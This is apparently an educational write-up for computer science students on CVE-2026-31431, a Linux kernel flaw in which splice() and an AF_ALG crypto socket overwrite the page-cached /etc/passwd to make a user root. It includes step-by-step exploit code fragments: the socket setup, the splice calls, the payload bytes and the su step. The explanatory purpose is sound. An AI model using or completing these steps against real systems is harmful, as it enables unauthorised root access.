CVE-2026-31431: Simplified Explanation for CS Students

Introduction

CVE-2026-31431 represents a critical Linux kernel vulnerability that demonstrates how unrelated system features can combine to create critical security flaws. This vulnerability allows any regular user to escalate privileges to root access by exploiting a flaw in how the kernel handles page cache operations with cryptographic sockets.

What makes this vulnerability particularly educational is that it involves fundamental operating system concepts that every computer science student should understand: file permissions, memory management, system calls, and the kernel's trust model. The exploit chain is elegant in its simplicity requiring just a few lines of code to completely compromise system security.

Here's my understanding of how this vulnerability works and what actually happens in the kernel during exploitation a simple explanation of what I learned.

Part 1: The Vulnerability (What's Broken?)

Background: What is a Page Cache?

When your program reads a file from disk, the kernel stores a copy in RAM. Next time you read the same file, it comes from RAM (fast) instead of disk (slow). This copy in RAM is called the page cache.

First read: Disk → RAM (page cache) → Your program
Second read: RAM (page cache) → Your program (much faster!)

The Problem in Simple Terms

Normally, the kernel protects data:

If you can read a file → you can read it
If you can't write to a file → you can't write to it

The bug: The kernel allows a non-root user to modify the page-cache copy of /etc/passwd (a protected file) because:

/etc/passwd is world-readable (everyone can read it)
The kernel assumes: "If you can read the file, we can safely process its cache pages"
BUT the kernel doesn't check if you should be allowed to write to those pages
Result: You can modify the cached copy without actually having write permission

Why This Happens

The vulnerability is in the algif_aead (cryptographic socket) code:

What's a Cryptographic Socket? AF_ALG (Algorithm Family) sockets let user programs access kernel crypto functions (encryption, hashing, etc.) without copying data to user space. Think of it as a "crypto accelerator" that works directly on kernel memory.

Normal expectation:

User has read access to /etc/passwd
→ Kernel can use it as INPUT to crypto operation
→ User gets the OUTPUT

The bug (wrong):

User has read access to /etc/passwd
→ Kernel uses it as both INPUT AND OUTPUT to crypto operation
→ Kernel writes back to the same page-cache page
→ User can modify a page they should only be able to read!

Code Example: What the Bug Allows

# Without the bug:
os.read(fd, 4096)  # ✓ Allowed: reading /etc/passwd
os.write(fd, b"hack")  # ✗ Blocked: not allowed to write

# With the bug:
# A cryptographic operation can modify the page-cache
# of /etc/passwd even though we only have read access
splice(fd_passwd, pipe) → AF_ALG_socket
# AF_ALG socket writes back to the page-cache page
# This SHOULD be blocked but ISN'T (the bug!)

Part 2: The Exploitation (How to Exploit It?)

Target: Modify Your UID to 0 (Root)

The file /etc/passwd looks like this:

username:x:UID:GID:comment:home:shell
student:x:1000:1000:Student User:/home/student:/bin/bash
          ↑
      This UID number

Attack goal: Change UID 1000 to 0000 (root's UID) in the page-cache copy.

Step-by-Step Exploitation

Step 1: Load /etc/passwd into Page Cache

# Force the file into RAM cache
fd = os.open("/etc/passwd", os.O_RDONLY)
os.read(fd, 4096)  # Read the entire file (4KB)
# Now /etc/passwd is in the kernel's page cache

Step 2: Create a Cryptographic Socket

# Create an AF_ALG socket for encryption/decryption
master = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
master.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
# This socket can modify page-cache pages (the vulnerability!)

Step 3: Use Splice to Feed the Cached Page Into the Socket

What's Splice? > splice() is a system call that moves data between file descriptors WITHOUT copying to user space. It's a "zero-copy" operation that directly transfers kernel memory pages. Normally this is great for performance, but here it lets us feed page-cache pages directly into the crypto socket.

# Splice moves data WITHOUT copying to user space
# This is key: it lets us feed kernel memory pages directly

# Read from /etc/passwd at the UID field offset
n = os.splice(fd_passwd, pipe, 32, offset_src=uid_offset)

# Write that data into the AF_ALG socket
# The socket will process it IN-PLACE (modify the page!)
n = os.splice(pipe, af_alg_socket.fileno(), n)

What happens inside the kernel:

/etc/passwd page in RAM:
[... username:x:1000:1000:... ]
                    ↑
                  This byte is in the page-cache

AF_ALG socket reads and writes to the SAME page:
Input:  Read 32 bytes starting at uid_offset
Output: Write results back to the SAME location
        (This is the bug! It shouldn't be allowed!)

Step 4: The Kernel's Scratch-Write (The Actual Corruption)

# We control the AAD (Additional Authenticated Data)
# The kernel copies bytes from AAD to the destination page
aad = b"\x00\x00\x00\x00" + b"0000"  # SPI + seqno_lo
#     ←4 zero bytes→     ←"0000"→
#     (SPI field)        (our payload: new UID)
#
# Why hex \x00? These are null bytes (value 0) required by the crypto protocol
# The "0000" is our actual payload - the UID we want to write to /etc/passwd

# When AF_ALG processes the request, it writes:
# destination_page[offset] = aad[4:8]  # "0000"
# This overwrites the UID field!

Step 5: Verify the Corruption

# Read /etc/passwd again from page cache
with open("/etc/passwd", "rb") as f:
    f.seek(uid_offset)
    uid_bytes = f.read(4)

print(uid_bytes)  # Output: b"0000"  ✓ Corruption successful!

Step 6: Exploit with su Command

# Now the page-cache says you're UID 0 (root)
# But /etc/shadow (password file) is unchanged

su student
# Enter your own password
# PAM checks password against /etc/shadow → ✓ CORRECT
# PAM checks UID in /etc/passwd → 0000 (root)
# kernel calls setuid(0) → SUCCESS!
# You now have a root shell!

Why This Works: The Permission Model Inversion

Normal File Permission Model:

File: /etc/passwd
Permissions: -rw-r--r--  (world-readable)

What a user can do:
✓ Read the file content
✗ Write to the file
✗ Modify the file

With This Bug:

User → Read /etc/passwd (allowed)
     → Load into page cache
     → Use splice() to feed page-cache into crypto socket
     → Kernel modifies the page-cache page
     → User can now read modified content!

Result: User can EFFECTIVELY WRITE to /etc/passwd
        without having write permissions!

Code Flow Diagram

User (UID 1000)
    ↓
[1] os.open("/etc/passwd", read-only)  ✓ Allowed
    ↓
[2] os.read(4096 bytes)  ✓ Allowed (world-readable)
    Page-cache now has /etc/passwd
    ↓
[3] Create AF_ALG socket
    ↓
[4] splice(fd_passwd → AF_ALG_socket)
    ↓
[5] Kernel's AF_ALG code (BUG HERE!):
    "We have page-cache pages from a readable file
     Let's do crypto operations on them in-place"

    ✗ BUG: Doesn't check if user should WRITE to the page!
    ✓ Only checks: can user READ the file? (yes)

    Page-cache /etc/passwd gets modified:
    "1000" → "0000"
    ↓
[6] getpwnam("student") reads from page-cache
    Returns: UID = 0000 (corrupted!)
    ↓
[7] su student
    ↓
[8] Password check (against /etc/shadow) → CORRECT ✓
    ↓
[9] setuid(0)  ← Uses corrupted UID from page-cache
    ↓
[10] Root shell obtained! 🎯

Key Insight: Why Splice Makes It Possible

Without Splice (Safe):

/etc/passwd (disk)
    ↓
User space buffer ← data COPIED here
    ↓
AF_ALG socket processes it
    ↓
User gets output
    ↓
Kernel never modifies the actual page-cache

With Splice (Vulnerable):

/etc/passwd (page-cache RAM)
    ↓
AF_ALG socket gets DIRECT ACCESS to the page
    ↓
"Zero-copy" means: reads AND writes to same page!
    ↓
Page-cache /etc/passwd is modified in-place
    ↓
This page is the "truth" for all file reads!
    ↓
Next read of /etc/passwd gets corrupted data

Simplified Summary

The Vulnerability

One broken assumption in the kernel:

"If a user can READ a file, then page-cache pages of that file can be safely modified in-place during cryptographic operations"

This assumption is wrong because:

Splice can feed those pages directly to output buffers
Users can modify page-cache without write permission
Page-cache corruption = file corruption (for all users!)

The Exploitation

Load /etc/passwd into page-cache (read-only is fine)
Use splice + AF_ALG socket to write to the page-cache
Modify UID field: 1000 → 0000
Call su with correct password
PAM validates password ✓ and UID = 0 from corrupted cache ✓
setuid(0) executed → root shell

Total attack time: ~5 seconds

Security takeaway: A single kernel bug in an obscure subsystem (AF_ALG) + a legitimate optimization (splice) = complete system compromise.

Conclusion

This vulnerability teaches us:

Page cache is critical infrastructure → must be protected
Zero-copy is powerful but dangerous → requires careful security design
Permission boundaries must be enforced at all layers → even in kernel
Combining features is risky → splice + AF_ALG was never meant to work together this way

Understanding vulnerabilities like CVE-2026-31431 helps us appreciate the complexity of operating system security and the importance of thorough security reviews when combining system features.

References & Learning Resources

Official Vulnerability Records

CVE-2026-31431 Official Record: CVE MITRE Database
National Vulnerability Database: NVD Details

Technical Analysis

Copy Fail Vulnerability Research: https://copy.fail/ - Comprehensive technical analysis of this specific vulnerability. Notable for being a straight-line logic flaw that doesn't require race conditions or kernel-specific offsets. The same 732-byte Python script can root every Linux distribution shipped since 2017.

Security Monitoring

CISA Known Exploited Vulnerabilities: CISA KEV Catalog